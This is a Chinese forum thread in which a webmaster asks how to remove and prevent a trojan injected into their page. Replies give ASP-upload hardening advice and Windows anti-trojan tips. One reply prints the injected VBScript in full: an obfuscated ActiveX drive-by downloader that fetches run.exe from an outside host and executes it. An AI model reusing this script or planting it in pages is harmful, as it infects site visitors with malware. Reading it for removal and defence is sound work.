网页被木马嵌入,如何驱除和预防,被嵌入的网页是http://m.ttixx.com/
大家有什么高招给小弟分享一下,谢谢

解决方案 »

  1.   

    被嵌入的代码如下,如何清除啊<script language= VBS>
        '1 xiaohui's Script    
        '2 update 2007.1.31
        pso = "ob"+"je"+"ct"
        '1
        Set df_fuck = document.createElement(pso)
        '1
        df_fuck.setAttribute "class"+"id", "clsid"+":BD96"+"C556"+"-65A3-11D0-98"+"3A-00C04"+"FC29E36"
        '1
        Set x_fuck = df_fuck.CreateObject("Mic"+"ros"+"oft."+"XML"+"HT"+"TP","")
        '1
        bs1="Ad"
        bs4="odb"+".S"+"tream"
        '1
        str1=bs1&bs4
        str5=str1
        '1
        set S_fuck = df_fuck.createobject(str5,"")
        '1
        S_fuck.type = 1
        '1
        str6="GET"
        '1
        geturl="htt"+"p://"+"m.ttixx.com/run.exe "                                                                  
        '2 
        x_fuck.Open str6, geturl, False
        '2
        x_fuck.Send
        '1
        filename1="MSDOS.pif"
        '1
        set F_fuck = df_fuck.createobject("Scripting.FileSystemObject","")
        '1
        on error resume next
        '1
        set tmp_fuck = F_fuck.GetSpecialFolder(2) 
        '1
        filename1= F_fuck.BuildPath(tmp_fuck,filename1)
        '1
        S_fuck.open
        '1
        S_fuck.write x_fuck.responseBody
        '1
        S_fuck.savetofile filename1,2
        '1
        S_fuck.close
        '1
        set Q_fuck = df_fuck.createobject("Shell.Application","")
        '2
        Q_fuck.ShellExecute filename1,"",""
        '3
        ps = "the end ^O^"
    </script>
      

  2.   

    大部分网站入侵都是利用asp木马完成的,特写此文章以使普通虚拟主机用户能更好地了解、防范asp木马。也只有空间商和虚拟主机用户共同做好防范措施才可以有效防范asp木马!
      1. 防范asp木马的重点就在于虚拟主机用户如何确保自己空间中asp上传程序的安全上!
    2.空间商由于无法预见虚拟主机用户会在自己站点中上传什么样的程序,以及每个程序是否存在漏洞,因此无法防止入侵者利用站点中客户程序本身漏洞上传asp木马的行为。空间商只能防止入侵者利用已被入侵的站点再次入侵同一服务器上其他站点的行为。这也更加说明要防范asp木马,虚拟主机用户就要对自己的程序严格把关!
    一.防范措施
    a、网站中没有任何上传程序和论坛程序
    ----- 非常安全b、网站中有上传程序或论坛程序,只有管理员可以上传程序,并对程序数据库做了保护措施
    ----- 一般安全c、网站中有上传程序或论坛程序,有许多用户可以上传程序,对程序数据库没有做保护措施
    ----- 非常危险!具体的防范措施:1、我们建议客户通过ftp来上传、维护网页,尽量不安装asp的上传程序。
    2、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的asp都要进行身份认证!另可以在不需要上传功能时将实现上传的asp文件改名或删除,如upload.asp、upfile.asp等,然后在需要使用时再通过ftp恢复原名或重新上传。
    3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
    4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。建议我公司的客户使用.mdb的数据库文件扩展名,因为我公司服务器设置了.mdb文件防下载功能.
    5、要尽量保持程序是最新版本。
    6、不要在网页上加注后台管理程序登陆页面的链接。
    7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可.
    8、要时常备份数据库等重要文件。
    9、日常要多维护,并注意空间中是否有来历不明的asp文件。尤其是用来专门存放上传文件的目录,如:uploadfile、uploadsoft等,如果发现不明的*.asp或*.exe文件应该立即删除,因为这些文件有90%的可能是入侵程序。记住:一分汗水,换一分安全!
    10、一旦发现被入侵,除非客户自己能识别出所有木马文件,否则要删除所有文件。重新上传文件前,所有asp程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。
    11、安装必要的入侵检测系统,及时更新杀毒软件。
    做好以上防范措施,您的空间只能说是相对安全了,决不能因此疏忽大意,因为入侵与反入侵是一场永恒的战争!  
      

  3.   

    防木马的办法,只针对网页木马,可以防止90%以上木马在你的机器上被执行,甚至杀毒软件发现不了的木马都可以禁止执行,先说一下原理。 现在网页木马大概有以下几种方式中到你的机器里: 
    1、把木马文件改成BMP文件,然后配合你机器里的DEBUG来还原成EXE,网上存在该木马20% ; 
    2、下载一个TXT文件到你机器,然后里面有具体的FTP连接,FTP连上他们有木马的机器下载木马,网上存在该木马20%; 
    3、也是最常用的方式,下载一个HTA文件,然后用网页控件解释器来还原木马,该木马在网上存在50%以上; 
    4、采用JS脚本,用VBS脚本来执行木马文件,该型木马偷QQ的比较多,偷传奇的少,大概占10%左右; 
    5、其他方式未知。 
    现在我们来说防范的方法,就是把 windows\system\mshta.exe文件改名,改成什么自己决定 (注意Windows2000和WindowsXp是在system32下)。 
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\下为Active Setup controls创建一个基于CLSID的新键值 {6E449683_C509_11CF_AAFA_00AA00 B6015C},然后在新键值下创建一个REG_DWORD 类型的键Compatibility,并设定键值为0x00000400即可。 
    还有windows\command\debug.exe和windows\ftp.exe都给改个名字 (或者删除) 。 
    一些最新流行的木马最有效果的防御 
    比如网络上流行的木马 smss.exe,这个是其中一种木马的主体,潜伏在 Windows98/WindowsMe/
    WindowsXp的c:\windows目录下,Windows2000的c:\winnt目录下。 
    假如你中了这个木马,首先我们用进程管理器结束正在运行的木马smss.exe,,然后在c:\windows 或 c:\winnt\目录下创建一个smss.exe,并设置为只读属性(2000/XP NTFS的磁盘格式的话那就更好,可以用“安全设置”设置为读取)。这样木马没了,以后也不会再感染了。这个办法本人测试过对很多木马,都很有效果。 
     注:有些木马的残骸留在了IE的临时文件夹里,他们没有被执行起来,没有危险性,所以建议清理临时文件夹和IE。